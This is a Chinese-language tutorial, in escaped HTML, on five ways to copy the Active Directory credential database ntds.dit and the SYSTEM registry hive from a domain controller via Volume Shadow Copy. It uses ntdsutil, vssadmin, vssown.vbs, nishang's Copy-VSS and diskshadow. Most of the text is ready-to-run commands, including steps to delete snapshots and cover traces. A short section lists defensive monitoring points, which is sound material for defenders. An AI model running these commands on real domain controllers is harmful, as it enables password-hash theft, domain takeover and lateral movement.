利用卷影拷贝服务攻击域控的五大方法详解<\/h1>

一、NTDS.DIT文件概述<\/h2>
在微软Active Directory(活动目录)中，所有数据都保存在ntds.dit文件中。NTDS.DIT是一个二进制文件，存在于域控制器的%SystemRoot%\ntds\NTDS.DIT<\/code>路径下，包含但不限于以下信息：<\/p>

用户名(Username)<\/li>
密码哈希(Hash)<\/li>
组信息(Group)<\/li>
组策略首选项(GPP)<\/li>
组织单位(OU)信息<\/li>
<\/ul>
与SAM文件类似，NTDS.DIT被Windows系统锁定，无法直接访问。因此，攻击者通常利用VSS(Volume Shadow Copy Service)卷影拷贝服务来获取该文件。<\/p>
二、五大攻击方法详解<\/h2>
方法1：使用ntdsutil工具提取<\/h3>
适用系统<\/strong>：Server 2003、Server 2008、Server 2012<\/p>
操作步骤<\/strong>：<\/p>


创建快照<\/strong>：<\/p>
ntdsutil snapshot "activate instance ntds"<\/span> create quit quit
<\/span><\/span><\/code><\/pre>创建后会生成一个GUID标识的快照副本。<\/p>
<\/li>

挂载快照<\/strong>：<\/p>
ntdsutil snapshot "mount {GUID}"<\/span> quit quit
<\/span><\/span><\/code><\/pre>快照通常挂载在类似C:\$SNAP_201808131112_VOLUMEC$\<\/code>的目录下。<\/p>
<\/li>

复制ntds.dit<\/strong>：<\/p>
copy<\/span> C:\$SNAP_201808131112_VOLUMEC$\windows\ntds\ntds.dit c:\temp\ntds.dit
<\/span><\/span><\/code><\/pre><\/li>

清理痕迹<\/strong>：<\/p>
ntdsutil snapshot "unmount {GUID}"<\/span> "delete {GUID}"<\/span> quit quit
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
方法2：使用vssadmin工具提取<\/h3>
适用系统<\/strong>：Server 2008、Server 2012<\/p>
操作步骤<\/strong>：<\/p>


创建卷影副本<\/strong>：<\/p>
vssadmin create shadow \/for=c:
<\/span><\/span><\/code><\/pre><\/li>

复制ntds.dit<\/strong>：<\/p>
copy<\/span> \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy5\windows\NTDS\ntds.dit c:\ntds.dit
<\/span><\/span><\/code><\/pre><\/li>

删除副本<\/strong>：<\/p>
vssadmin delete shadows \/for=c: \/quiet
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
方法3：使用vssown.vbs脚本提取<\/h3>
脚本下载<\/strong>：

https:\/\/raw.githubusercontent.com\/borigue\/ptscripts\/master\/windows\/vssown.vbs<\/p>
操作步骤<\/strong>：<\/p>


启动卷影复制服务<\/strong>：<\/p>
cscript vssown.vbs \/start
<\/span><\/span><\/code><\/pre><\/li>

创建卷影副本<\/strong>：<\/p>
cscript vssown.vbs \/create c
<\/span><\/span><\/code><\/pre><\/li>

列出当前卷影副本<\/strong>：<\/p>
cscript vssown.vbs \/list
<\/span><\/span><\/code><\/pre><\/li>

复制ntds.dit<\/strong>：<\/p>
copy<\/span> \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\NTDS\ntds.dit c:\ntds.dit
<\/span><\/span><\/code><\/pre><\/li>

删除卷影副本<\/strong>：<\/p>
cscript vssown.vbs \/delete {GUID}
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
方法4：使用NTDSUTIL的IFM创建卷影副本<\/h3>
操作步骤<\/strong>：<\/p>


创建IFM并复制文件<\/strong>：<\/p>
ntdsutil "ac i ntds"<\/span> "ifm"<\/span> "create full c:\/test"<\/span> q q
<\/span><\/span><\/code><\/pre>该命令会将：<\/p>

ntds.dit复制到c:\test\Active Directory<\/code>目录<\/li>
SYSTEM和SECURITY文件复制到c:\test\registry<\/code>目录<\/li>
<\/ul>
<\/li>

清理痕迹<\/strong>：<\/p>
rmdir<\/span> \/s\/q test
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
PowerShell替代方法<\/strong>：

使用nishang工具包中的Copy-VSS.ps1脚本：<\/p>
import-module .\Copy-VSS.ps1
<\/span><\/span>Copy-vss
<\/span><\/span><\/code><\/pre>脚本会将SAM、SYSTEM、ntds.dit复制到脚本同目录中。<\/p>
方法5：使用diskshadow导出ntds.dit<\/h3>
优势<\/strong>：<\/p>

微软官方签名工具<\/li>
默认包含在Server 2008\/2012\/2016中<\/li>
支持非交互模式操作<\/li>
<\/ul>
操作步骤<\/strong>：<\/p>


创建命令文件(command.txt)<\/strong>，内容如下：<\/p>
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% k:
exec "cmd.exe" \/c copy k:\Windows\NTDS\ntds.dit c:\ntds.dit
delete shadows all
list shadows all
reset
exit
<\/code><\/pre>
<\/li>

执行命令<\/strong>：<\/p>
diskshadow \/s c:\command.txt
<\/span><\/span><\/code><\/pre>注意：必须在C:\windows\system32\<\/code>目录下执行<\/em><\/p>
<\/li>

导出SYSTEM文件<\/strong>：<\/p>
reg save hklm\system c:\windows\temp\system.hive
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
三、防御措施<\/h2>


监控VSS服务使用<\/strong>：<\/p>

检测涉及ntds.dit的可疑操作<\/li>
监控System Event ID 7036(VSS服务启动标志)<\/li>
监控VSSVC.exe进程创建事件<\/li>
<\/ul>
<\/li>

监控工具使用<\/strong>：<\/p>

监控diskshadow.exe及相关子进程的创建<\/li>
在客户端设备上监控diskshadow.exe实例创建<\/li>
<\/ul>
<\/li>

系统加固<\/strong>：<\/p>

非必要情况下删除diskshadow.exe<\/li>
监控新的逻辑驱动器映射事件<\/li>
<\/ul>
<\/li>

日志分析<\/strong>：<\/p>

定期分析系统日志中的可疑卷影拷贝活动<\/li>
建立异常操作告警机制<\/li>
<\/ul>
<\/li>
<\/ol>
四、总结要点<\/h2>


工具选择<\/strong>：<\/p>

diskshadow.exe最为灵活且为微软官方工具<\/li>
vssadmin和ntdsutil为系统自带工具<\/li>
vssown.vbs需要额外下载<\/li>
<\/ul>
<\/li>

操作注意事项<\/strong>：<\/p>

使用diskshadow.exe时必须在system32目录下执行<\/li>
操作完成后务必清理痕迹(删除快照)<\/li>
检查导出的ntds.dit文件大小以确保完整性<\/li>
<\/ul>
<\/li>

攻击扩展<\/strong>：<\/p>

这些方法可通过WMI或PowerShell远程执行<\/li>
可结合其他工具进行自动化攻击<\/li>
<\/ul>
<\/li>

关键文件<\/strong>：<\/p>

获取ntds.dit的同时必须获取SYSTEM文件(包含解密密钥)<\/li>
也可一并获取SAM文件以增强攻击效果<\/li>
<\/ul>
<\/li>
<\/ol>
通过以上五种方法，攻击者可以有效地获取域控中的关键凭据信息，进而实现横向移动和权限提升。防御方应重点关注VSS服务的异常使用和系统自带工具的可疑调用。<\/p>